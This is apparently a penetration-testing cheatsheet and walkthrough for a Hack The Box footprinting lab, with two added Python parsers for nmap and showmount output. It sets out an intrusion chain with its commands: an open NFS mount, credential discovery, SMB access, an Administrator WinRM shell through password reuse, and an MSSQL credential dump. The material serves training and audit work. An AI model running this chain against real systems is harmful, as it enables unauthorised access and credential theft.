Methodology Checklist
- Full port scan + service version detection
- Enumerate FTP, SMB, SSH, and any web services discovered
- Check for anonymous access on all services
- Test default credentials on each identified service
- Enumerate SMB shares and accessible files
- Brute-force SSH if credentials are not found passively
- Document all access paths found for reporting
Operational Context
Think Dumber First: a Medium lab means the path is more guided; one or two main services are the key, not comprehensive enumeration. Focus on finding credentials in the first service that unlock the next. Check default passwords immediately for any management interface. The foothold is usually a misconfiguration, not a CVE.
When you land here: Medium Footprinting Lab. Identify the 2-3 key services. Check for default/weak credentials first. Look for credential exposure in service configs or outputs. Use discovered credentials to access next service. Flag is within reach after 2-3 pivots.
Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| sudo nmap -p- --min-rate 1000 -T4 [TARGET_IP] -oN all_ports.nmap | Fast full TCP port scan |
| ports=$(grep "open" all_ports.nmap | cut -d "/" -f 1 | tr "\n" ",") | Extract open ports |
| sudo nmap -sV -sC -p $ports [TARGET_IP] -oA detailed_scan | Detailed scan on confirmed ports |
| showmount -e [TARGET_IP] | Check for NFS shares |
| sudo mount -t nfs [TARGET_IP]:/TechSupport ./target_share -o nolock | Mount NFS share |
| smbclient -L [TARGET_IP] -U [USER] | List SMB shares with credentials |
| smbclient //[TARGET_IP]/[SHARE] -U [USER] | Connect to SMB share |
| evil-winrm -i [TARGET_IP] -u Administrator -p '[PASS]' | Gain WinRM shell |
| sqlcmd -S . -E -Q "[SQL]" | Query MSSQL via trusted auth |
Deep Dive & Workflow
Attack Chain: Nmap → NFS unauthenticated access → Credential discovery → SMB with credentials → WinRM shell → MSSQL data extraction
Phase 1: Initial Recon
- All-ports TCP scan → identify NFS (111/2049), SMB (445), WinRM (5985)
- Parse ports: ports=$(grep "open" all_ports.nmap | cut -d "/" -f 1 | tr "\n" ",")
- Detailed version scan on open ports
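The grep/cut/tr one-liner above works, but it keeps any line containing the word "open" (including "open|filtered" ports nmap could not confirm) and leaves a trailing comma in $ports. The parser below is an added example, not part of the original notes: it reads the same -oN file format with a strict line pattern so only real port lines count, separates confirmed from unconfirmed ports, and emits a clean -p argument. The scan output is constructed for the example and the target address is a placeholder.

```python
import re

# Constructed sample of `nmap -oN` output (not real scan data); the address is
# a placeholder, not a real target.
SAMPLE_NMAP_OUTPUT = """\
# Nmap 7.94 scan initiated Mon Jan  1 00:00:00 2024 as: nmap -p- --min-rate 1000 -T4 [TARGET_IP] -oN all_ports.nmap
Nmap scan report for [TARGET_IP]
Host is up (0.020s latency).
Not shown: 65529 closed tcp ports (reset)
PORT      STATE         SERVICE
111/tcp   open          rpcbind
135/tcp   open          msrpc
445/tcp   open          microsoft-ds
2049/tcp  open          nfs
5985/tcp  open          wsman
49664/tcp open|filtered unknown
# Nmap done at Mon Jan  1 00:01:00 2024 -- 1 IP address (1 host up) scanned in 60.00 seconds
"""

# Only lines shaped like "445/tcp   open   microsoft-ds" are port lines.
PORT_LINE = re.compile(r"^(\d{1,5})/(tcp|udp)\s+(\S+)\s+(\S+)")


def parse_open_ports(text, include_filtered=False):
    """Return the sorted port numbers whose STATE column is 'open'.

    Comment lines and the 'Not shown: ... closed' summary never match the
    pattern, so the result does not depend on the word 'open' being absent
    elsewhere in the file. 'open|filtered' ports are excluded unless
    include_filtered is set, because nmap could not confirm them.
    """
    ports = set()
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if not m:
            continue
        port, _proto, state, _service = m.groups()
        if state == "open" or (include_filtered and state == "open|filtered"):
            ports.add(int(port))
    return sorted(ports)


def port_spec(ports):
    """Format a port list as an nmap -p argument, with no trailing comma."""
    return ",".join(str(p) for p in ports)


if __name__ == "__main__":
    confirmed = parse_open_ports(SAMPLE_NMAP_OUTPUT)
    print("confirmed open:", port_spec(confirmed))
    print("including open|filtered:",
          port_spec(parse_open_ports(SAMPLE_NMAP_OUTPUT, include_filtered=True)))
```

Feed a real all_ports.nmap in with `parse_open_ports(open("all_ports.nmap").read())`; the same parser is handy on the defensive side for triaging scan output from your own exposure checks, where the distinction between confirmed and unconfirmed ports decides what gets a ticket.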
Phase 2: NFS Access
- showmount -e [TARGET_IP] → find accessible share (e.g., /TechSupport (everyone))
- Mount and browse → find credential file
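The "(everyone)" in the showmount output is the whole finding: showmount prints it when the server reports no client list for an export, so any host that can reach port 2049 may mount it. The script below is an added example (not part of the original notes) that parses showmount -e output and flags exports with no client restriction, which is the same check an administrator would run against their own NFS servers to catch the misconfiguration before a lab-style walkthrough does. The sample output is constructed and the address is a placeholder.

```python
import re

# Constructed sample of `showmount -e` output (not real data); the address is
# a placeholder.
SAMPLE_SHOWMOUNT = """\
Export list for [TARGET_IP]:
/TechSupport (everyone)
/Backups     10.0.0.0/24
/Home        *
/Staging     192.168.1.10,192.168.1.11
"""

# Export path, then whatever client specification follows it.
EXPORT_LINE = re.compile(r"^(/\S*)\s+(.+?)\s*$")

# Client specifications that impose no restriction at all. showmount prints
# "(everyone)" when the server returns an empty client list; a bare "*"
# wildcard is treated the same way here.
WORLD = {"(everyone)", "everyone", "*"}


def parse_exports(text):
    """Return [(path, [client, ...]), ...] from showmount -e output.

    The first line ("Export list for ...:") is skipped; each remaining line is
    an export path followed by a comma-separated list of allowed clients.
    """
    exports = []
    for line in text.splitlines()[1:]:
        m = EXPORT_LINE.match(line)
        if not m:
            continue
        path, clients = m.groups()
        exports.append((path, [c.strip() for c in clients.split(",") if c.strip()]))
    return exports


def world_accessible(exports):
    """Return the export paths any host may mount (no client restriction)."""
    return [path for path, clients in exports
            if any(c.lower() in WORLD for c in clients)]


if __name__ == "__main__":
    exports = parse_exports(SAMPLE_SHOWMOUNT)
    for path, clients in exports:
        print(f"{path}: {', '.join(clients)}")
    print("unrestricted exports:", world_accessible(exports))
```

The mitigation an export audit should drive is the obvious one: restrict each export to the client addresses or subnet that actually need it, and keep credential material off shares entirely. Exports scoped to a subnet, like /Backups above, still deserve a look but are not reported as unrestricted.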
Phase 3: SMB Enumeration
- Use found credentials to list SMB shares
- Connect to non-standard share → find SA/Administrator password in text file
Phase 4: WinRM Shell
- Password reuse: evil-winrm -i [TARGET_IP] -u Administrator -p '[PASS]'
- Confirm: whoami
Phase 5: MSSQL Data
- From Administrator shell: sqlcmd -S . -E -Q "..." (trusted auth = no separate DB login)
- List databases → identify custom database
- List tables → dump contents → find target user credentials
Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Initial service seems hardened with no obvious path | Credentials not found yet | Enumerate more carefully: check SNMP, NFS, and anonymous file shares for config files with credentials |
| Found credentials but can't determine which service to try them against | Too many open services | Try against web login first (usually HTTP basic or form-based), then SSH, then SMB |
| Lab reset during session, losing progress | HTB lab timeout | Document discovered credentials and ports in notes immediately; labs can reset; re-enumerate quickly with saved notes |
| Service enumeration reveals nothing after 30 minutes | Approach is too narrow | Check for UDP services: nmap -sU --top-ports 20 [TARGET]; check all web ports including 8080/8443 |
| Connected to wrong target | Multiple targets in lab network | Confirm IP from HTB lab page; use ip route to check your VPN routing; ping correct target IP |
Reporting Trigger
Finding Title: (Lab exercise: document the exploitation chain as a mini-pentest narrative. Identify: Vulnerability Class (misconfiguration/default creds/CVE), Attack Path, Impact (data exposed/access gained), and Recommendation for each finding.)